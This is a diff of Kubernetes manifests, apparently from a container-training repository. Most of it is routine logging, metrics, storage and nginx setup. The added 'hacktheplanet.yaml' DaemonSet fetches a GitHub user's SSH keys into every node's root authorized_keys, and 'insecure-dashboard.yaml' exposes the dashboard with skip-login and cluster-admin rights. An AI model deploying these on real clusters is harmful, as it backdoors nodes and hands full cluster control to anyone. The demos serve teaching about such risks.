path: ${path.config}/inputs.d/*.yml
|
||||
# Reload inputs configs as they change:
|
||||
reload.enabled: false
|
||||
modules:
|
||||
path: ${path.config}/modules.d/*.yml
|
||||
# Reload module configs as they change:
|
||||
reload.enabled: false
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# hints.enabled: true
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-inputs
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
kubernetes.yml: |-
|
||||
- type: docker
|
||||
containers.ids:
|
||||
- "*"
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
in_cluster: true
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat-oss:7.0.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: elasticsearch-es.default.svc.cluster.local
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
value: changeme
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: inputs
|
||||
mountPath: /usr/share/filebeat/inputs.d
|
||||
readOnly: true
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: inputs
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-inputs
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
34
k8s/hacktheplanet.yaml
Normal file
34
k8s/hacktheplanet.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hacktheplanet
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hacktheplanet
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hacktheplanet
|
||||
spec:
|
||||
volumes:
|
||||
- name: root
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: root
|
||||
mountPath: /root
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
@@ -14,5 +14,5 @@ frontend the-frontend
|
||||
|
||||
backend the-backend
|
||||
server google.com-80 google.com:80 maxconn 32 check
|
||||
server bing.com-80 bing.com:80 maxconn 32 check
|
||||
server ibm.fr-80 ibm.fr:80 maxconn 32 check
|
||||
|
||||
|
||||
@@ -9,7 +9,7 @@ spec:
|
||||
name: haproxy
|
||||
containers:
|
||||
- name: haproxy
|
||||
image: haproxy
|
||||
image: haproxy:1
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /usr/local/etc/haproxy/
|
||||
|
||||
@@ -1,14 +1,13 @@
|
||||
apiVersion: extensions/v1beta1
|
||||
apiVersion: networking.k8s.io/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: cheddar
|
||||
name: whatever
|
||||
spec:
|
||||
rules:
|
||||
- host: cheddar.A.B.C.D.nip.io
|
||||
- host: whatever.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: cheddar
|
||||
servicePort: 80
|
||||
|
||||
serviceName: whatever
|
||||
servicePort: 1234
|
||||
|
||||
360
k8s/insecure-dashboard.yaml
Normal file
360
k8s/insecure-dashboard.yaml
Normal file
@@ -0,0 +1,360 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-csrf
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
data:
|
||||
csrf: ""
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-key-holder
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-settings
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster", "dashboard-metrics-scraper"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Metrics Scraper to get metrics from the Metrics server
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods", "nodes"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: kubernetesui/dashboard:v2.0.0-rc2
|
||||
imagePullPolicy: Always
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
- --namespace=kubernetes-dashboard
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
- --enable-skip-login
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"beta.kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 8000
|
||||
targetPort: 8000
|
||||
selector:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
|
||||
spec:
|
||||
containers:
|
||||
- name: dashboard-metrics-scraper
|
||||
image: kubernetesui/metrics-scraper:v1.0.2
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
protocol: TCP
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTP
|
||||
path: /
|
||||
port: 8000
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumeMounts:
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"beta.kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
volumes:
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
|
||||
---
|
||||
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- sh
|
||||
- -c
|
||||
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
|
||||
image: alpine
|
||||
name: dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: dashboard
|
||||
type: NodePort
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: insecure-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
10
k8s/just-a-pod.yaml
Normal file
10
k8s/just-a-pod.yaml
Normal file
@@ -0,0 +1,10 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: hello
|
||||
namespace: default
|
||||
spec:
|
||||
containers:
|
||||
- name: hello
|
||||
image: nginx
|
||||
|
||||
@@ -19,7 +19,7 @@ spec:
|
||||
image: gcr.io/kaniko-project/executor:latest
|
||||
args:
|
||||
- "--context=/workspace/dockercoins/rng"
|
||||
- "--skip-tls-verify"
|
||||
- "--insecure"
|
||||
- "--destination=registry:5000/rng-kaniko:latest"
|
||||
volumeMounts:
|
||||
- name: workspace
|
||||
|
||||
@@ -12,11 +12,6 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
# Configuration to deploy release version of the Dashboard UI compatible with
|
||||
# Kubernetes 1.8.
|
||||
#
|
||||
# Example usage: kubectl create -f <this_file>
|
||||
|
||||
# ------------------- Dashboard Secret ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
@@ -95,7 +90,7 @@ subjects:
|
||||
# ------------------- Dashboard Deployment ------------------- #
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1beta2
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
@@ -114,7 +109,7 @@ spec:
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
|
||||
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.10.1
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
|
||||
110
k8s/local-path-storage.yaml
Normal file
110
k8s/local-path-storage.yaml
Normal file
@@ -0,0 +1,110 @@
|
||||
# This is a local copy of:
|
||||
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: local-path-storage
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: local-path-provisioner-role
|
||||
namespace: local-path-storage
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: ["nodes", "persistentvolumeclaims"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: [""]
|
||||
resources: ["endpoints", "persistentvolumes", "pods"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: [""]
|
||||
resources: ["events"]
|
||||
verbs: ["create", "patch"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: local-path-provisioner-bind
|
||||
namespace: local-path-storage
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: local-path-provisioner-role
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: local-path-provisioner
|
||||
namespace: local-path-storage
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: local-path-provisioner
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: local-path-provisioner
|
||||
spec:
|
||||
serviceAccountName: local-path-provisioner-service-account
|
||||
containers:
|
||||
- name: local-path-provisioner
|
||||
image: rancher/local-path-provisioner:v0.0.8
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- local-path-provisioner
|
||||
- --debug
|
||||
- start
|
||||
- --config
|
||||
- /etc/config/config.json
|
||||
volumeMounts:
|
||||
- name: config-volume
|
||||
mountPath: /etc/config/
|
||||
env:
|
||||
- name: POD_NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
volumes:
|
||||
- name: config-volume
|
||||
configMap:
|
||||
name: local-path-config
|
||||
---
|
||||
apiVersion: storage.k8s.io/v1
|
||||
kind: StorageClass
|
||||
metadata:
|
||||
name: local-path
|
||||
provisioner: rancher.io/local-path
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
reclaimPolicy: Delete
|
||||
---
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: local-path-config
|
||||
namespace: local-path-storage
|
||||
data:
|
||||
config.json: |-
|
||||
{
|
||||
"nodePathMap":[
|
||||
{
|
||||
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
|
||||
"paths":["/opt/local-path-provisioner"]
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
138
k8s/metrics-server.yaml
Normal file
138
k8s/metrics-server.yaml
Normal file
@@ -0,0 +1,138 @@
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: system:aggregated-metrics-reader
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rules:
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: metrics-server:system:auth-delegator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:auth-delegator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: metrics-server-auth-reader
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: extension-apiserver-authentication-reader
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: apiregistration.k8s.io/v1beta1
|
||||
kind: APIService
|
||||
metadata:
|
||||
name: v1beta1.metrics.k8s.io
|
||||
spec:
|
||||
service:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
group: metrics.k8s.io
|
||||
version: v1beta1
|
||||
insecureSkipTLSVerify: true
|
||||
groupPriorityMinimum: 100
|
||||
versionPriority: 100
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: metrics-server
|
||||
template:
|
||||
metadata:
|
||||
name: metrics-server
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
serviceAccountName: metrics-server
|
||||
volumes:
|
||||
# mount in tmp so we can safely use from-scratch images and/or read-only containers
|
||||
- name: tmp-dir
|
||||
emptyDir: {}
|
||||
containers:
|
||||
- name: metrics-server
|
||||
image: k8s.gcr.io/metrics-server-amd64:v0.3.3
|
||||
imagePullPolicy: Always
|
||||
volumeMounts:
|
||||
- name: tmp-dir
|
||||
mountPath: /tmp
|
||||
args:
|
||||
- --kubelet-preferred-address-types=InternalIP
|
||||
- --kubelet-insecure-tls
|
||||
- --metric-resolution=5s
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
labels:
|
||||
kubernetes.io/name: "Metrics-server"
|
||||
spec:
|
||||
selector:
|
||||
k8s-app: metrics-server
|
||||
ports:
|
||||
- port: 443
|
||||
protocol: TCP
|
||||
targetPort: 443
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: system:metrics-server
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- pods
|
||||
- nodes
|
||||
- nodes/stats
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: system:metrics-server
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:metrics-server
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
@@ -5,7 +5,7 @@ metadata:
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
run: testweb
|
||||
app: testweb
|
||||
ingress:
|
||||
- from:
|
||||
- podSelector:
|
||||
|
||||
@@ -5,6 +5,6 @@ metadata:
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
run: testweb
|
||||
app: testweb
|
||||
ingress: []
|
||||
|
||||
|
||||
@@ -16,7 +16,7 @@ metadata:
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
run: webui
|
||||
app: webui
|
||||
ingress:
|
||||
- from: []
|
||||
|
||||
|
||||
8
k8s/nginx-1-without-volume.yaml
Normal file
8
k8s/nginx-1-without-volume.yaml
Normal file
@@ -0,0 +1,8 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-without-volume
|
||||
spec:
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
13
k8s/nginx-2-with-volume.yaml
Normal file
13
k8s/nginx-2-with-volume.yaml
Normal file
@@ -0,0 +1,13 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-volume
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
21
k8s/nginx-3-with-git.yaml
Normal file
21
k8s/nginx-3-with-git.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-git
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
- name: git
|
||||
image: alpine
|
||||
command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /www/
|
||||
restartPolicy: OnFailure
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-volume
|
||||
name: nginx-with-init
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
@@ -11,11 +11,10 @@ spec:
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
initContainers:
|
||||
- name: git
|
||||
image: alpine
|
||||
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /www/
|
||||
restartPolicy: OnFailure
|
||||
|
||||
98
k8s/persistent-consul.yaml
Normal file
98
k8s/persistent-consul.yaml
Normal file
@@ -0,0 +1,98 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
